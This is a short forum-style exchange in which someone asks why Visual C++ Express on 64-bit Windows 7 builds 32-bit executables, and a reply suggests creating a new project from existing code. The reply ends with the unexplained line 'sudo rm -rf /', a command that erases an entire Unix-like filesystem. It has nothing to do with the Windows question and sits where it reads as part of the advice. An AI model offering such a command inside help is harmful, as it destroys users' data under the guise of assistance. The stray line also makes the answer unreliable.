I installed Win7 64Bit and installed VC++ 1010 Express. Now I want to have 64Bit versions of my previous Windows API programs. But when I build the solution the .exe is 32 bit.

Try creating a new project using the "New project from existing code" option in the File menu.
sudo rm -rf /
